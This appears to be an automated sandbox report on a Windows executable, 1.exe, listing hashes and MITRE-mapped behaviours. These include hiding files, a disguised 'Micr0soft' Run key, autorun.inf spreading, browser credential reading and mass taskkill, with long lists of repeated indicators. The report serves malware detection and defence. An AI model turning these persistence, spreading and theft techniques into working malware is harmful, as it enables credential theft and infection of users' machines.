280268db673f66dc31e54d86de101cf8b5d52c583a9282d9c7ccb4475612a8e0

Analysis

max time kernel
150s
max time network
19s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20-11-2024 13:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.exe
Size

104KB
MD5

5e488441d160b82bdf55b0547f8cb28f
SHA1

f3dc1a56e21b25849e97d32be01afa8e8e0b6269
SHA256

39f3c5f6717bd58b4bd299d6b0ea2eac3c2b62eaa1207b1c15d3e3d09589d6d2
SHA512

85fe28c8b1cbeca5805c305fab96d6eb03bade72e82fe23ddbe7e89b1d29315bb0ded0f1adc41c1c8cfd8e8b888ed1ab03d77cb571912695389d3c064e4dc713
SSDEEP

1536:/e8f5p+nyS3pPEnFZ60oYJjEiVf5ppW0S3pPpnW:28Wny4p2TpjEiVRW04p5W

Score

8^/10

discovery evasion persistence spyware stealer upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Sets file to hidden 1 TTPs 64 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
868	attrib.exe
2684	attrib.exe
2712	attrib.exe
2844	attrib.exe
736	attrib.exe
1884	attrib.exe
3004	attrib.exe
532	attrib.exe
932	attrib.exe
1484	attrib.exe
2388
1276
2800	attrib.exe
2756	attrib.exe
2748	attrib.exe
1084	attrib.exe
736	attrib.exe
2176	attrib.exe
376	attrib.exe
2960	attrib.exe
2344	attrib.exe
2084	attrib.exe
1108	attrib.exe
888	attrib.exe
3060	attrib.exe
824	attrib.exe
1656	attrib.exe
2100	attrib.exe
1832	attrib.exe
456	attrib.exe
2832	attrib.exe
944	attrib.exe
2628	attrib.exe
1628	attrib.exe
1956	attrib.exe
1424	attrib.exe
872	attrib.exe
2188	attrib.exe
264	attrib.exe
2372	attrib.exe
1632	attrib.exe
1448	attrib.exe
112	attrib.exe
2776
1288
2980	attrib.exe
2192	attrib.exe
616	attrib.exe
2576	attrib.exe
1232	attrib.exe
2864	attrib.exe
1116	attrib.exe
1532	attrib.exe
2788	attrib.exe
2180	attrib.exe
1720
596	attrib.exe
2764	attrib.exe
1080	attrib.exe
1600	attrib.exe
1100
956
2220	attrib.exe
2112	attrib.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Micr0soft = "C:\\WINDOWS\\system32\\foto.exe"	reg.exe

Drops autorun.inf file 1 TTPs 64 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

description	ioc	process
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe

Drops file in System32 directory 2 IoCs

Processes:

1.exeattrib.exe

description	ioc	process
File created	C:\Windows\SysWOW64\windows_update.bat	1.exe
File opened for modification	C:\Windows\SysWOW64\windows_update.bat	attrib.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral9/memory/2256-0-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral9/memory/2256-11-0x0000000000400000-0x000000000041C000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

xcopy.exeattrib.exetaskkill.exeattrib.exexcopy.exexcopy.exeattrib.exexcopy.exexcopy.exexcopy.exetaskkill.exexcopy.exexcopy.exetaskkill.exeattrib.exexcopy.exexcopy.exexcopy.exexcopy.exetaskkill.exexcopy.exeattrib.exeattrib.exetaskkill.exexcopy.exeattrib.exexcopy.exexcopy.exetaskkill.exexcopy.exexcopy.exexcopy.exetaskkill.exexcopy.exeattrib.exexcopy.exexcopy.exeattrib.exeCMD.EXExcopy.exexcopy.exetaskkill.exeattrib.exexcopy.exeattrib.exeattrib.exeattrib.exexcopy.exeattrib.exetaskkill.exexcopy.exeattrib.exe1.exexcopy.exexcopy.exeattrib.exeattrib.exetaskkill.exetaskkill.exexcopy.exexcopy.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1168	taskkill.exe
3052	taskkill.exe
1656	taskkill.exe
1988	taskkill.exe
1832	taskkill.exe
2580	taskkill.exe
3028	taskkill.exe
1376	taskkill.exe
2992	taskkill.exe
524	taskkill.exe
1664
2152	taskkill.exe
1676	taskkill.exe
2464	taskkill.exe
1788	taskkill.exe
896
1664	taskkill.exe
2644	taskkill.exe
1016	taskkill.exe
2452	taskkill.exe
2192	taskkill.exe
2452
1408
2220	taskkill.exe
2956	taskkill.exe
2496	taskkill.exe
2028	taskkill.exe
1004	taskkill.exe
3040	taskkill.exe
1636	taskkill.exe
2564	taskkill.exe
2320	taskkill.exe
1260	taskkill.exe
896	taskkill.exe
1960	taskkill.exe
1636	taskkill.exe
336	taskkill.exe
2260	taskkill.exe
2668	taskkill.exe
2040	taskkill.exe
2228	taskkill.exe
616	taskkill.exe
860	taskkill.exe
2652	taskkill.exe
2292	taskkill.exe
1760	taskkill.exe
2304	taskkill.exe
1168	taskkill.exe
1432	taskkill.exe
1048	taskkill.exe
1664	taskkill.exe
436	taskkill.exe
2128	taskkill.exe
1712	taskkill.exe
1696	taskkill.exe
2092	taskkill.exe
1836	taskkill.exe
2292
2668	taskkill.exe
1828	taskkill.exe
2572	taskkill.exe
2732	taskkill.exe
2700	taskkill.exe
1436	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1628 reg.exe

pid	process
1628	reg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	1212	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	584	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1432	taskkill.exe
Token: SeDebugPrivilege	1168	taskkill.exe
Token: SeDebugPrivilege	2480	taskkill.exe
Token: SeDebugPrivilege	2220	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	272	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeDebugPrivilege	2948	taskkill.exe
Token: SeDebugPrivilege	2892	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	1492	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	2580	taskkill.exe
Token: SeDebugPrivilege	2732	taskkill.exe
Token: SeDebugPrivilege	1008	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	844	taskkill.exe
Token: SeDebugPrivilege	2668	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	2448	taskkill.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeDebugPrivilege	2948	taskkill.exe
Token: SeDebugPrivilege	2892	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	1492	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1976	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1.exe

pid process

2256 1.exe

pid	process
2256	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1.exeCMD.EXE

description	pid	process	target process
PID 2256 wrote to memory of 2296	2256	1.exe	CMD.EXE
PID 2256 wrote to memory of 2296	2256	1.exe	CMD.EXE
PID 2256 wrote to memory of 2296	2256	1.exe	CMD.EXE
PID 2256 wrote to memory of 2296	2256	1.exe	CMD.EXE
PID 2296 wrote to memory of 1628	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 1628	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 1628	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 1628	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2472	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2472	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2472	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2472	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2564	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2564	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2564	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2564	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2652	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2652	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2652	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2652	2296	CMD.EXE	reg.exe
PID 2296 wrote to memory of 2872	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2872	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2872	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 2872	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3016	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3016	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3016	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3016	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3020	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3020	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3020	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3020	2296	CMD.EXE	attrib.exe
PID 2296 wrote to memory of 3024	2296	CMD.EXE	attrib.exe
